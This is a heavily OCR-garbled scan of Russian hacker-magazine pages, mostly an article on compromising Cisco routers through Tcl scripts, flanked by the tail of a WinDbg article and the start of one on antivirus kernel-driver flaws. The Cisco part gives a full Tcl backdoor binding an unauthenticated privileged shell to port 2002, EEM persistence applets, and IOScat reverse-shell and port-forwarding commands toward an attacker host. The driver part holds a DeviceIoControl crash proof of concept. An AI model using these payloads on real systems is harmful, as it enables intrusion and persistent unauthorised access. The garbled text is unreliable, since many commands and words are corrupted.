Руібоп. 

Заключение 

Конечно, рассмотренный здесь материал - это капля в море возмож- 
ностей ѴѴіпОЬд. Я не коснулся, например, такой обширной темы, как 
написание плагинов. Чтобы освоить этот гигантский функционал, 
нужно время, терпение и опыт. Свои вопросы, как всегда, шли мне на 
е-таіі. пе 



Полезные ссылки 

«Сайт ѴѴіпОЬд плагина рукб, там же и примеры использования 
[еп/ги]: 

рѵкб.собер[ех.сот/ѵѵікіраде?ге1еггіпдТіие=Ноппе 

«Страница загрузки ОеЬиддіпд ТооІ$ іог ѴѴіпсІо\л/$, в состав 
которых входит ѴѴіпОЬд [еп/ги]: 

тісгозоІксот/уѵМс/беѵІооІз/беЬиддіпд/сІеІаии.ппБрх 

Очень объемный документ, посвященный возможностям 
ѴѴіпсІЬд [еп]: 

ѵѵіпбЬд.іпІо/боѵѵпІоаб/бос/рбІ/ѴѴіпРЬд А Іо I соІог.рсИ 

•Очень краткое введение в скриптовый язык обсуждаемого 
отладчика [еп]: 

битрапаІѵгіз.огд/ѴѴСРА/ѴѴСРА-ЗатрІе-СЬарІег.рбІ 
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■ ■ Ильин Роман Ровіііѵе ТесЬпоІодіез 



АТАКА ПОДМЕНОЙ ТС Ь-С КРИПТА 



Подмена скриптов 
наТРТР-СЕРВЕРЕ 



ТРТР- 

192 



Р-Сервер 

.168.1.4 




./ШрЬооІ/ 
.істр.іср 



Шр://1 92.1 68.1 .4/істр.ІсІ 




Получение удаленного ЗИеІІ 

ГрІ$ес(5)тахраІгоІ~}$ Іеіпеі гоиіег 2002 
Тгуіпд 192. 168. 1.10... 

СоппесіесПо гоиіег. 

Езсаре сііагасіегг із ' Л ]. 

Сізсо гоиіег асігпіп сопзоіе: 

Коиіег# 



Загрузка скрипта 
маршрутизатором 



Маршр 

192.16 



ПОКОРЯЕМ 

СІЗСО 



Атака через ТСІ. 



в Достаточно часто в ходе проведения работ по тестированию 
на проникновение встречаются машрутизаторы Сізсо Зузіетз 
с привилегированным доступом (Іеѵе1 15), что позволяет использовать 
их для дальнейшего развития атак с использованием функционала ТСІ.. 
Сейчас я опишу несколько методов данных атак, и поверь, 
их использование действительно приводит к повышению прав на якобы 
защищенном маршрутизаторе. 



та - (тооь соммаіѵю іаысііасе) - скриптовый язык ЧАСТО 

ПРИМЕНЯЕМЫХ С ГРАФИЧЕСКОЙ БИБЛИОТЕКОЙ ТК, приду- 
ман в начале 80-х годов и из-за своей простоты продолжает 
повсеместно использоваться как встроенный в различные при- 
ложения; вспомним хотя бы программы ехресі или ІРС-ботов 
еддсігор, а также использование его как модуля к серверной 
части арасбе тосМсІ. В операционную систему 105, исполь- 
зуемую маршрутизаторами Сізсо ТсІ, был введен с версии 105 
12.3(2]Т [ сізсо. сот/еп/Ц5/с!ос5/іо5/1 2 31/12 Зі2ДеаІиге/диіс1е/ 
ді ІсІ.ЫтІ І. что позволило реализовать в маршрутизаторах 
Сізсо Сузіеппз функции выполнения «пользовательских» скрип- 
тов. Как наиболее часто встречаемый пример, использование 
105 ІѴР для создания интерактивных голосовых меню в систе- 
мах ІР-телефонии. 

Используя функционал ТсІ, мы имеем возможность работать с 
сокетами, в данном случае открывается некоторая перспектива 
использования маршрутизатора для следующих действий: 



• Разработки собственного варианта «бэкдора» с целью 
закрепления системы и доступа к ней в обход штатных 
механизмов защиты; 

• Проведения сканирования портов в различных сегмен- 
тах сети; 

• Проброса действующих портов на порт интерфейса, ор- 
ганизации обратного (реверсного) доступа к удаленным 
устройствам ; 

• Разработки вариантов скриптов для возможности пере- 
бора паролей (брутфорса) различных устройств и серве- 
ров в сети. 

Данными методами также может воспользоваться злоумышлен- 
ник, получив доступ к ТРТР-серверу компании, где размещены 
существующие скрипты и принудительно заменить существующий 
сценарий на собственный. В этом случае произойдет его загрузка 
и запуск на маршрутизаторе. 



► 064 
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Получение удаленного ЗІіеІІ 

ГрІ$ес(д)тахраІгоІ~}$ Іеіпеі гоиіег 2002 
Тгуіпд 192. 168. 1.10... 

СоппесіесІ (о гоиіег. 

Езсаре сііагасіегз із ' Л ]. 

Сізсо гоиіег асігпіп сопзоіе: 

Коиіег# 



./ШрЬооІ/ 

.істр.іср 




ПРИМЕР ЗАГРУЗКИ СКРИПТА-БЭКДОРА 



1с1зЫГ1р://192. 168. 1.4/істр.ІсІ 







Загрузка скрипта 




маршрутизатором 





ТРТР-Сервер 

(атакующего) 

192.168.1.4 




Практикуемся 

Давай попробуем понять, как это можно реализовать с помо- 
щью удаленного шелла, который можно использовать без явной 
аутентификации с входом на назначенный порт по протоколу 
Теіпеі. Подобный сценарий использовался в качестве задания 
на соревнованиях «Рускрипто СТР 2010». 

В первую очередь давай разберем, как работает Тсі на устройствах 
под управлением 105. 

Для первичной загрузки ТСІ_-скриптов необходимо иметь при- 
вилегированный доступ не ниже уровня 1 5 (епаЫе). Скрипт Тсі 
необходимо загружать удаленно, для этого можно использовать 
такие протоколы, какТРТР, РТР, РСР, 5СР. Загрузку и выполнение 
скрипта можно выполнять как напрямую в РАМ-маршрутизатора, 
так и в РІ_А5Н-память с последующим его запуском с файловой 
системы 105. 

Загрузка скрипта во РІ_А5Н и последующее его выполнение: 

Коикег# сору кікр : //192 . 168 . 1 . 4/зсгірк . ксі кіазк:// 
зсгірк . ксі 

Коикег# ксізк кіазк : / /зсгірк . ксі 

Загрузка скрипта непосредственно с ТРТР-сервера: 

Коикег# ксізк кккр: //192 . 168 . 1 . 4/зсгірк . ксі 

Ниже приведен пример ТСІ_-скрипта, который при запуске 
захватывает сокет на порт Т С Р/2002 и связывает его с интер- 
фейсом командной строки (ЕХЕС). Загрузка скрипта выполняется 
методами, описанными выше (в приведенном примере с сервера 
ТЕТР). 

ргос саІІЬаск {воск асМг рогк} { 

ксопкідиге $зоск -кгапзіакіоп сгік -Ъиккегіпд Ііпе 
рикз $зоск "Сізсо гоикег асітіп сопзоіе:" 
рикз $зоск " " 

рикз -попехѵііпе $зоск "Коикег# " 
кіизк $зоск 

кііееѵепк $зоск геаЬаЫе [Іізк еско $зоск] 

} 

ргос еско {воск} { 
дІоЬаІ ѵаг 

кіизк $зоск 

ік { [сакск {декз $зоск Ііпе}] I I 
[еок $зоск] } { 
гекигп [сіозе $зоск] 

) 



сакск {ехес $1іпе} гезиік 
ік { [сакск {рикз $зоск $гезиік}]} { 
гекигп [сіозе $зоск] 

) 

рикз -попеѵ/ііпе $зоск "Коикег# " 
кіизк $зоск 
} 

зек рогк 2002 

зек зк [зоскек -зегѵег саІІЬаск $рогк] 
лллгаік ѵаг 
сіозе $зк 

После загрузки и последующего запуска вышеприведенного 
скрипта появится возможность зайти в систему (режим ЕХЕС) без 
использования учетных записей и выполнять любые команды с 
привилегиями супер-пользователя (Іеѵеі 15). 

[ркзесОшахракгоІ ~]$ кеіпек гоикег 2002 
Тгуіпд 192.168.1.10... 

СоппескеЬ ко гоикег. 

Езсаре скагаскег із ' Л ] ' . 

Сізсо гоикег аЬшіп сопзоіе: 

Коикег# 

Далее я бы хотел рассказать о некоторых ограничениях, кото- 
рые необходимо помнить при работе с Тсі на устройствах под 
управлением 105. В первых версиях 105, включающих поддержку 
Тсі, скрипт продолжал свою работу даже при прерывании ЕХЕС- 
сессии. В новых версиях последовало исправление, которое 
завершает работу скрипта при обрыве линии или по команде сіеаг 
Ііпе. Этот «патч -фи кс» производителя можно обойти несколькими 
способами: 

1. На линиях, (сопзоіе 0 или ѵіу 0 4), с которых запускается скрипт, 
применить команду ехес-іітеоиі 0 0, в противном случае по завер- 
шении сессии скрипт завершит свою работу. 

Коикег>еп 
Коикег#сопк к 

Епкег сопкідигакіоп согшпапЬз , опе рег Ііпе. ЕпЬ мікк 
СЫТЬ /2 . 

Коикег (сопкід) #1іпе ѵку 0 4 

Коикег (сопкід-ііпе) #ехес-кішеоик 0 0 

2 . Производить запуск скрипта с использованием апплетов ЕЕМ 
(ЕтЬесИесІ Еѵепі Мападег) по триггеру, которым может быть любое 
действие, в том числе периодический запуск по таймеру. На при- 
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взлом 



РЕВЕРСНЫЙ ШЕЛЛ ЗА 2 МИНУТЫ! 



Ісізіі Шр://1 92.168.1 .4/іо$саШ - 
-іе-оа 192.168.1.4 -ор12345 




ПОЛУЧАЕМ ШЕЛЛ НА СІ5СО 



Получение удаленного ЗІіеІІ 

ГрІ$ес@тахраІгоІ-}$ Іеіпеі гоиіег 2082 
Тгуіпд 192. 168. 1.10... 

СоппесіесНо гоиіег. 

Езсаре сііагасіегз із ' л ]. 

Роиіег# 



./ШрЬооІ/ 

.іозсаиср 




Ісізіі №р://1 92.168.1.4/ 
іозсаЦсІ -ір2002 -ое 



ТРТР-Сервер 

(атакующего) 

192.168.1.4 



Загрузка скрипта 
маршрутизатором 




тизатор 
.168.1.10 



мере ниже показана конфигурация, которая загружает скрипт с 
ТРТР после запуска маршрутизатора по истечении 20 секунд. 

КоиВег (сопВід) # еѵепВ шападег аррІеВ ВАСКБООК 
КоиВег (сопВід-аррІеВ) # еѵепВ Вітег соипВсІоші пате 
Беіау Віте 20 

КоиВег (сопВід-аррІеВ) # асВіоп 1.0 сіі соттапсі "епаЫе" 
КоиВег (сопВід-аррІеВ) # асРіоп 1.1 сіі соттапсі "ВсІзЪ. 
рррр://192. 168.1. 4/зсгірВ . Рсі " 

КоиВег (сопВід-аррІеВ) # асРіоп 1.2 зузіод тзд "Васксіоог 
із ехесиВеб" 

3. Конвертировать ТСІ_-скрипт в формат политик ЕЕМ (ЕтЬесІсІесІ 
Еѵепі Мападег) и запускать их по триггеру, которым может быть 
любое действие, в том числе периодический запуск по таймеру. 

Готовые утилиты 

Иногда можно использовать готовые скрипты, такие как ІОБсаІ и 
ІОЗітар, входящие в ІОБсаІ, позволяющие осуществлять проброс 
портов, прием и передачу файлов путем манипуляций с сокетами. 
Используя встроенный языкТСЕ, можно использовать маршрутизатор 
аналогично ПК с установленным приложением Ыеісаі, предваритель- 
но загрузив скрипт ТСІ_ в ІіазЬ-маршрутизатор или через ТЕТР-сервер 
напрямую в РАМ. Методика загрузки и установки ТСІ_ на маршрутиза- 
тор описана выше. Примеры реализации смотри ниже по тексту. 
Организация бэкдора на маршрутизаторе (2002 порт): 

КоиВег# ВсІзЪ. ВВВр: //192 . 168 . 1 . 4/іозсаС . Всі -ір2002 -ое 

Организация реверсного шелла на адрес атакующего (порт 12345): 

КоиВег# ВсІзЪ. ВіСр: //192 . 168 . 1 . 4/іозсаС . Ссі -іе 
-оа192 .168.1.4 -ор!2345 



(на твоей машине приемником шелла выступает обычный 
пеВсаВ: пс -1 -р 12345) 

Проброс удаленного порта на локальный порт маршрутизатора 
( 2002 ): 

КоиВег# ВсІзЪ. ВВВр : / /192 . 168 . 1 . 4/іозсаВ . Всі -ір2002 
-оа192 .168.2.1 -ор80 

У данного скрипта есть много других примеров, например копиро- 
вание файлов с использованием сокетов, имитация телнет-сессии 
на удаленном хосте и много других функций, которые можно 
посмотреть на сайте разработчика. 

Скрипт с названием ІОБтар - не что иное, как попытка создать 
аналог сканера птар, конечно, в урезанном функционале, но в 
данном случае достаточно эксклюзивным для работы в среде 105. 
Функционал этого ТСІ_-скрипта позволяет производить сканиро- 
вание диапазонов ІР-адресов на открытые ТСР/ІЮР-порты, в том 
числе с использованием метода инвентаризации хостов посред- 
ством протокола ІСМР. Рассмотрим примеры использования: 

КоиВег>еп 

КоиВег #Вс1зіі ВВВр : / /192 . 168.1. 4/іозтар .Всі 
192.168.1.1-5 -р20-24, 80,443 
Ьоасііпд іозтар.ВсІ Вгот 192.168.1.4 (ѵіа 
РазВЕВЬ.егпеВО/0 ) : ! 

[ОК - 15912 ЬуВез] 

Ьоасііпд зегѵісез . ІізВ Вгот 192.168.1.4 (ѵіа 
РазВЕВЬ.егпеВО/0) : ! 

[ОК - 42121 ЬуВез] 

ЗВагВіпд ІОЗтар 0.9 ( ЬВВр: / /ѵллпл . беВаиІВгоиВе . са ) аВ 
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ПРОБРАСЫВАЕМ ШЕЛЛ 



Проброс порта маршрутизатором 
[рІ$ес@тахраІгоІ ~]$ Іупх Шр://1 92.1 68.4:2002 




Описание средства МахРаігоІ 



Ісізіі Шр://1 92.1 68.1. 4/іозсаІ.ІсІ - 
Ір2002-оа192.168.2.1 -ор80 




Методы обнаружения 

Имея возможность запускать скрипты, также интересно иметь воз- 
можность отследить их исполнение. Сделать это можно, подсмо- 
трев процессы и состояние портов на маршрутизаторе, используя 
следующие команды маршрутизатора: 



2002-03-01 02:59 ЦТС 



Егее Метогу оп РІаРРогт = 29038388 / Метогу гедиігесі 



КоиРег# зЫчл ргосеззез сри I і Тсі 
212 2284 17762 128 3.68? 

0.67% 162 Тсі Зегѵ - РРуІб 



2Л 



Рог РЪ.із 


зсап = 2622514 














КоиРег# зНочл Рср ЬгіеР аіі 




НозР 192, 


.168.1.1 


із 


ипаѵаіІаЫе 


ТСВ Ьосаі Асісігезз Еогеідп Асісігезз 


( зРаРе] 










659СБАВС 192.168.1.10.23 192.168.1.4.5163 


ЕЗТАВ 


НозР 192, 


.168.1.2 


із 


ипаѵаіІаЫе 


654485В4 * . 2 002 *.* 


ЫЗТЕЫ 










65СА2Б04 * . 80 *.* 


ЫЗТЕИ 


НозР 192, 


.168.1.3 


із 


ипаѵаіІаЫе 














Начиная с версии 105 12.4(4)Т появилась возможность 


использо- 


ІпРегезРіпд рогРз 


оп РюзР 192.168.1.4 


вания СРР (Сопігоі Ріапе Роіісу): 




РОКТ 


8 ТАТЕ 




ЗЕКѴІСЕ 






20/Рср 


сіозесі 




РРр-сІаРа 


КоиРег# зікж сопргоі-ріапе РюзР ореп-рогРз 




21/Рср 


сіозесі 




ТРр 


АсРіѵе іпРегпеР соппесРіопз (зегѵегз апсі езРаЫізЬесі) 


22/Рср 


сіозесі 




ззЬ 






23 /Сер 


сіозесі 




РеІпеР 


РгоР 1 Ьосаі Асісігезз 1 Еогеідп Асісігезз 1 Зегѵісе 1 ЗРаРе 


24/Рср 


сіозесі 




ргіѵ-шаіі 






80/Рср 


ореп 




НРРр 


Рср I * : 23 I * : 0 I ТеІпеР I ЫЗТЕЫ 




443 /Рср 


сіозесі 




Црррз 


Рср I * : 23 I 192 .168.1.4:13791 ТеІпеР I Е8ТАВЫЗ 












Рср | * : 80 | * : 0 | НТТР СОКЕ | ЫЗТЕЫ 




НозР 192, 


.168.1.5 


із 


ипаѵаіІаЫе 


РсрІ *:1234 | *:0 I Тсі Зегѵ - РРуІбЗІЫЗТЕИ 





КоиРег# 

Изменение вариантов сканирования скрипта возможно путем 
добавления аргументов: 

-зР - только по ответу хоста; 

-зТ - ТСР-портов методом ТСР соппесР; 

-зЮ - ШР-портов через функционал ІР ЗЬА. 

Учитывая богатые возможности ТСІ_, можно разработать множество 
подобных интересных приложений для реализации их в сетевой 
среде на оборудовании Сізсо Сузіетз. 



Также можно использовать и автоматизированные средства, такие 
как система контроля защищенности и соответствия стандартам 
МахРаІгоІ (доступен для скачивания на різесигііѵ.ги ). 

Послесловие 

Таким образом, все поняли, что любую, даже самую защищен- 
ную Сізсо можно захватить умело написанным и запущенным 
ТСІ_-сценарием. В итоге злоумышленник получает шелл со всеми 
вытекающими отсюда последствиями. А защититься от этого можно 
только грамотной настройкой маршрутизатора, периодическим 
обновлением 105 и ежедневным мониторингом логов подключений. 
В общем, не ленитесь и ухаживайте за своей Сізсо :). ~к~ 
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Уязвимости в драйверах проактивных защит 



* Многим известно, что большое количество программ используют 
драйверы режима ядра в ѴѴіпсІоѵѵз как «окно» для доступа в более 
привилегированный режим - Кіпд 0. В первую очередь это касается 
защитного ПО, к которому можно отнести антивирусы, межсетевые 
экраны, НІРЗ'ы (Но$і Іпігизіоп РгеѵепШп Зузіеш) и программы класса 
іпіегпеізесигііу. 



ОЧЕВИДНО, ЧТО КРОМЕ ОСНОВНЫХ ФУНКЦИЙ ПОДОБНЫЕ 
ДРАЙВЕРЫ БУДУТ ОСНАЩЕНЫ ТАКЖЕ МЕХАНИЗМАМИ ВЗАИ- 
МОДЕЙСТВИЯ, ПРЕДНАЗНАЧЕННЫМИ ДЛЯ ОБМЕНА ДАННЫМИ 
МЕЖДУ ДРАЙВЕРОМ И ДРУГИМИ ПРОГРАММНЫМИ КОМПО- 
НЕНТАМИ, РАБОТАЮЩИМИ В ПОЛЬЗОВАТЕЛЬСКОМ РЕЖИМЕ. 
ТОТ ФАКТ, ЧТО КОД, работающий на высоком уровне привилегий, 
получает данные от кода, работающего на уровне привилегий 
более низком, заставляет разработчиков уделять повышенное вни- 
мание вопросам безопасности при проектировании и разработке 
упомянутых выше механизмов взаимодействия. Однако как с этим 
обстоят дела на практике? 



Сага про іосП 

Сейчас мы максимально широко рассмотрим тему уязвимостей в 
драйверах защитного ПО, их эксплуатации и поиска. И начнем с 
диспетчера ввода-вывода. 

Существует достаточно много как документированных, так и не 
очень системных механизмов, которые могут быть использованы 
для организации взаимодействия кода пользовательского режима 
с драйверами режима ядра. Самыми функциональными и наибо- 
лее часто используемыми являются те, которые предоставляются 
диспетчером ввода-вывода (1/0 тападег]. В конце концов, именно 
они и создавались разработчиками операционной системы для 
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Девайсы ігепсі тісго 



подобных задач. Давай рассмотрим, как обычно организуется 
работа с диспетчером ввода-вывода со стороны драйвера и при- 
ложения. После загрузки драйвер создает именованный объект 
ядра «устройство», используя функцию ІоСгеаІеОеѵісе. Для обра- 
ботки обращений к созданным устройствам драйвер ассоциирует 
со своим объектом набор функций-обработчиков. Эти функции 
вызываются диспетчером ввода-вывода при выполнении опреде- 
ленных операций с устройством (открытие, закрытие, чтение, 
запись и т.д.), а также в случае некоторых системных событий 
(например, завершения работы системы или монтирования раз- 
дела жесткого диска). Структура, описывающая объект «драйвер», 
называется ОРІѴЕР_ОВЗЕСТ, а эти функции — ІРР (1/0 Рециезі 
Раскеі) обработчиками. Их адреса драйвер помещает в поле 
ОРІѴЕР_ОВЭЕСТ::Ма]огРипсііоп, которое, по своей сути, является 
массивом указателей, имеющим фиксированный размер I РР_М 
МАХІМІІМ_ЕІІІ\ІСТІОМ + 1. 

Константа ІРР_МЗ_МАХІМІІМ_ЕІІІ\ІСТІОМ определена в заголо- 
вочных файлах Огіѵег Оеѵеіортепі Кіі (ОйК) как 27. Как видишь, 
типов событий, связанных с устройством, довольно много. ІРР- 
обработчики имеют следующий прототип: 



ЬуресІеЬ 

БТЗТАТБЗ 

(*РБКІѴЕК_БІ5РАТСН) ( 

Ш БСгисС _БЕѴІСЕ_ОВБЕСТ *БеѵісеОЬз есЬ , 

Ш зЬгисі: _ІКР *Ігр 
) ? 

Параметр 0еѵісе0Ь)ес1 указывает на конкретное устройство (у 
одного драйвера их может быть много), а Ігр — на структуру, содер- 
жащую различную информацию о запросе к устройству, такую как 
контрольный код, буферы для входящих и исходящих данных, ста- 
тус завершения обработки запроса и многое другое. 

Так как устройство, создаваемое драйвером, является имено- 
ванным объектом, оно видно в пространстве имен диспетчера 
объектов. Это позволяет открывать его по имени, используя функ- 
цию СгеаІеЕіІе/ОрепЕіІе (или ее паііѵе-аналог — ЖСгеаІеЕіІе/ 
ІЧЮрепЕіІе). Именно это, как правило, в первую очередь и делает 
код пользовательского режима, которому необходимо передать 
драйверу, владеющему устройством, какой-либо запрос. Во время 
открытия устройства, в контексте процесса, осуществляющего эту 
операцию, вызывается обработчик драйвера ІРР_МЗ_СРЕАТЕ. 
Подобные уведомления позволяют драйверу управлять открытием 
своих устройств — он может запретить или разрешить это по свое- 
му усмотрению. Если открытие устройства со стороны драйвера 
было разрешено, система создает ассоциированный с устройством 
объект ядра типа «файл», дескриптор которого возвращается 



і ргЬЫер Ни іг^ ч Чг-±м ь*» ь*ьп зі-чіс В? -г ю рг**- е-пг. сил»-;* 

Гйі і г.;ы^ . 

з*1і М 

ЕГ ЕМ* іі тт ЛГЯ уйи\1 ТМі іГг'*- ь НШП, 

’^илгт спирит ег. И 1 тРіт; чгггмі йрвпп іпіЧп г 1 пѵ 

іЕврЕ : 

Г II гі/і г віі г і ^ г*~ф >иі >]рлі г і:і ГіОГСи^гг И |’н‘ йрМ I у ІЛ-Н Л 1 1 ЁіІі 

ЕМі ІІ І гь|^ ІгЫІіП іІІйЛ, Ці & 1 ІйП-ІГЧ ■ІГѴРі«и , *Г‘ 

Гэг ■ ■Р'Т-ЗТ Г 5 уСЩ г-ВСГІ 
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Да будет В5СЮ 

функцией СгеаІеЕіІе. Когда устройство открыто, приложение может 
вызывать функции РеабЕІІе, ѴѴгіІеЕіІе и ОеѵісеІоСопІгоІЕіІе для 
взаимодействия с драйвером. 

Наибольший интерес для нас представляет последняя функция. 
Ниже представлена схема, поясняющая способ обработки запроса 
после вызова данной функции: 

вооь 

ѴШТАРІ 

БеѵісеІоСопЬгоІ ( 

НАББЬЕ ЬБеѵісе, 

БѴГОКБ сІѵЛоСопЬгоІСосІе , 

ЬРѴОІБ ІрІпВиІІег , 

БШЕБ пІпВиІІегЗіге , 

ЬРѴОІБ ІрОиЬВиІІег , 

БТлЮКБ пОиЬВиІІегЗіге , 

ЬРБШКБ ІрВуЬезКеЬигпесІ, 

ЬРОѴЕКЬАРРЕБ ІрОѵегІарресІ 

) ; 

В качестве параметра ЬОеѵісе она получает дескриптор устройства, 
в ІрІ п Виббег и пІпВи^егЗіге передается указатель на буфер с вхо- 
дящими данными и его размер, а в ІрОиіВиІбег и пОиіВиІбегЭіге — 
указатель и размер буфера для данных, которые будут возвращены 
драйвером. 

Отдельно стоит рассказать о параметре бѵѵІоСопІгоІСобе. Он пред- 
ставляет собой двойное слово и служит для указания драйверу 
кода операции, которую мы хотим осуществить. Поддерживаемые 
драйвером значения кода запроса ввода-вывода определяются на 
этапе написания конкретного драйвера (то есть жестко «зашиты» в 
его код) и выбираются разработчиком не по произвольному прин- 
ципу. Вот какую информацию извлекает диспетчер ввода-вывода 
из этого двойного слова: 

• ОЕѴІСЕ ТУРЕ - идентиф икатор устройства (биты 16-31); диапа- 
зон 0-7ЕЕЕ6 зарезервирован Місгозоіі, а значение из диапазона 
8000И-0ЕЕЕЕ6 может быть любым, по усмотрению разработчика 
драйвера. Это значение также передается функции ІоСгеаІеОеѵісе 
в качестве параметра ОеѵісеТуре при создании устройства. 

• АССЕ55 — набор флагов, определяющих права доступа к устрой- 
ству. 

• РИЕ_АМѴ_АССЕ55 — максимальные права доступа. 

• РИЕ_РЕАО_АССЕ$$ — права на чтение данных из устройства. 

• РИЕ_\Л/РІТЕ_АССЕ5$ — права на передачу данных к устройству. 

• РІМЧСТЮМ — определяет операцию, выполнение которой требует- 
ся от драйвера. 

• МЕТНСЮ — определяет метод ввода-вывода. 

• МЕТНОО-ВІІРРЕРЕО — буферизированный ввод-вывод. 

Диспетчер выделяет в не подкачиваемом пуле буфер, размер 
которого равен наибольшему размеру, указанному в параметрах 
пІпВиІбегЭіге и пОиіВиІбегЭіге функции ОеѵісеІоСопІгоІ. В этот 
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Перехваченные системные сервисы 

буфер копируются данные из пользовательского входного буфера 
(параметр ІрІпВиббе г). Адрес этого буфера передается обработчи- 
ку ІВР_Ки_БЕѴІСЕ_СОІ\ІТРОІ_ в поле АззосіаІебІгр.ЗузІеппВи^ег 
структуры ІРР, а его размер — в поле РагатеІегз.БеѵісеІоСопІхоІ 
ІприіВиІіегІепдіН структуры І0_8ТАСК_І_0САТІ0М. После того, как 
обработчик драйвера был вызван, диспетчер ввода-вывода копи- 
рует возвращаемые драйвером в этом же системном буфере дан- 
ные в пользовательский буфер. Размер копируемых данных ГВР- 
обработчик должен указать сам, в параметре ІоЗіаІиз.ІпІюгппаІіоп 
структуры ІРР. 

• МЕТНОО_ІЫ_ОІРЕСТ И МЕТНОО_ОІЯ_ОІВЕСТ — ситуация с 
входным буфером аналогична буферизированному вводу-выводу. 
Выходной пользовательский буфер обрабатывается несколько 
иначе — описывающий его М01_ помещается в поле МсІІАсІсІгезз 
структуры ІРР. Входной буфер, несмотря на его название, может 
служить как источником, так и приемником данных. 

• МЕТНОО_ЫЕІТНЕР — операции по обработке как входных, так и 
выходных буферов целиком и полностью ложатся на плечи раз- 
работчика. В поле ОеѵісеІоСопІгоЕТуреЗІприіВи^ег структуры 
І0_8ТАСК_І_0САТІ0І\І содержится указатель на пользовательский 
входной буфер, а в поле ІІзегВиІіег структуры ІРР — указатель на 
пользовательский выходной буфер. 

Проверка указателей 

Для валидации изег-ппосіе указателей используются документи- 
рованные в ОйК функции РгоЬеЕогРеаб/РгоЬеЕогѴѴгіІе. Если ты 
используешь метод ввода-вывода МЕТНСЮ_І\ІЕІТНЕР, то в качестве 
дополнительной меры обязательно нужно подвергать аналогичной 
проверке указатель на входные и выходные пользовательские 
данные ІРР-запроса (поля ОеѵісеІоСопІгоІ.ТуреЗІприіВи^ег и 
ІІзегВиІіег). 

Причем для выходного буфера следует использовать функцию 
РгоЬеЕогѴѴгіІе, так как он может находиться на странице памяти 
пользовательского режима, не имеющей разрешение на запись, 
что, в свою очередь, вызовет В8о0 при попытке записать туда что- 
либо из драйвера. Важно отметить, что при вызове этих функций с 
параметром длины, равным нулю, никаких проверок выполняться 
не будет. Этот нюанс используется при эксплуатации уязвимостей. 
Также не стоит забывать, что эти функции можно использовать 
только на РА88ІѴЕ- АРС ІРО Беѵеі. На уровнях йРС и выше их 
использование может привести к появлению синего экрана, так 
как на этих уровнях обращения к выгружаемой памяти режима 
ядра не отлавливаются структурными обработчиками исключений. 

Типичные уязвимости 

Кроме специфичных для этой атаки уязвимостей, связанных 
с валидацией указателей, также часто встречаются типичные 
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уязвимости, такие как переполнение стека, целочисленное 
переполнение и т.д. Рассмотрим драйвер одного антивирусного 
продукта. 

Смотрим информацию об устройстве Іппібі: 

кб> ! беѵокд ітісіі 
Веѵісе окдесі ( 812 сс 9 і 0 ) із іог: 
ітісіі*** ЕКЕОК: Мосіиіе Іоаб сотріеіесі Ъиі зутЬоІз 
соиісі поі Ье Іоабеб іог ітісіі . вуз 
\ Вгіѵе г \ ітісіі ВгіѵегОідесі 816693 Ь 8 
Сиггепі Ігр 00000000 КеіСоипі 1 Туре 00000022 Еіадз 
00000040 

Васі е 12 сЬЬЬ 4 ВеѵЕхі 812 ссаа 8 ВеѵОЬдЕхі 812 ссаЬ 0 
ЕхіепзіопЕІадз ( 0000000000 ) 

Веѵісе диеие із поі Ьизу. 

кб> !бгѵокд 81 бб 93 Ь 8 2 

Вгіѵег окдесі ( 81 бб 93 Ь 8 ) із іог: 

\Вгіѵег\ітіс 1 і 

ВгіѵегЕпігу: іОіОсБОБ ітібі 

БгіѵегЗкагЦІо : 00000000 
БгіѵегЮпІоасЗ: 00000000 
АсМБеѵісе: 00000000 

Бізракск гоикіпез: 

[0е] ІЕР_МЦ_БЕѴІСЕ_СОЫТЕОБ І0І07Ь3 8 Бшксаі + ОхсіЬЗ 8 
< адрес обработчика ІоСЫ вызовов 

Как видно из листинга, устройство Іппібі обрабатывается драйве- 
ром ІплІбі.зуБ. Бегло проанализировав код, мы обнаружили ошибку, 
ведущую к разрушению пула ядра (Кегпеі Рооі Метогу Соггирбоп, 
листинг ищи на БѴБ): 

А теперь нехитрый код для воспроизведения В5оБ: 

ЦБеѵісе = СгеабеЕі 1 еА( 

" \\\\ . \\бтббі " , 

СЕБЕЕІС_ЕЕАБ | СЕБЕЕІС_ШІТЕ , 

0, 

0, 

ОРЕМ_ЕХІЗТШС, 

0, 

ШББ) ; 

іпЬиіі = (скаг *) таііос ( 0 x 4000 ) ; 

іі ( ІіпЬиіі) 

{ 
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КегпеІ $расе 



1)$ег зрасе 




Режим ядра 



N1011.011 




Пользовательский 

режим 

ЫГОеѵісеІоСопігоІРіІе 



ОеѵісеІоСопігоІ 



Привет с презентации рускрипто 



ргіпкТ ( "таііос Іаііесі! \п" ) ; 
геРигп 0; 




} 

шешзеЬ ( іпЬи^^ , 1 А 0x40 00-1) ; 

іосЫ = 0x220044; 

ВеѵісеІоСопСгоІ (АВеѵісе , іосШ, 

(ЬРѴОІВ) іпЬиІІ, 0x10, 

(ЬРѴОІВ) іпЪиІІ, 0x10, &сЬ,ШЬЬ) ; 

ЗузсаІІ 

Разработчики драйверов антивирусных компаний 
реализуют перехват различных системных сервисов. 
Перехваты системных сервисов реализуют различный 
функционал — от самозащиты до блокирования атак 
на повышение привилегий (загрузка драйвера через 
І\Ш_оасЮгіѵег). Разумеется, в этом случае также нужно 
предпринимать все необходимые меры для проверки 
получаемых параметров. Однако особенность именно 
системных сервисов заключается в том, что они могут 
быть вызваны как из пользовательского режима (2ѵѵ* 
и N1* функции пШ.сІІІ), так и из режима ядра (2ѵѵ* 
функции піозкгпі.ехе). В последнем случае параметры 
сервиса могут содержать указатели на память режима 
ядра, и это нужно как-то учитывать во время их про- 
верки. К счастью, для определения того, из какого 
режима был осуществлен вызов системного сервиса, 
разработчики ядра предоставили в наше полное рас- 
поряжение функцию ѲеіРгеѵіоизМосІе. Она возвращает 
значение поля РгеѵіоизМосІе структуры КТНРЕА0, опи- 
сывающей текущий поток, а само значение устанавли- 
вается диспетчером системных вызовов. Большинство 
реализаций перехвата различных системных сервисов 
антивирусного рынка подвержены атаке Расе СопсПбоп 
(РС) (более четкий подвид Т0СТТ01І). По словам ком- 
пании Маіоизес, в рамках ее исследования был реали- 
зован анализ продуктов всех антивирусных компаний 
на наличие РС, однако они не обнародовали РоС/ 
Ехріоіі. 

Рассмотрим по шагам, как же можно проанализировать 
и реализовать атаку на антивирусные продукты через 
перехват 550Т-функции, используя РС. 

1. Нужно определить список перехватываемых 
функций; для этого запускаем любимый антируткит 
(РкІІпбоокег, 6МЕР — выбор авторов) и смотрим пере- 
хваты в 550Т: 



І/О Мападег собственной персоной 



пккгпіра . ехе-->ВГЦСгеакеКеу , Туре: Асісігезз 
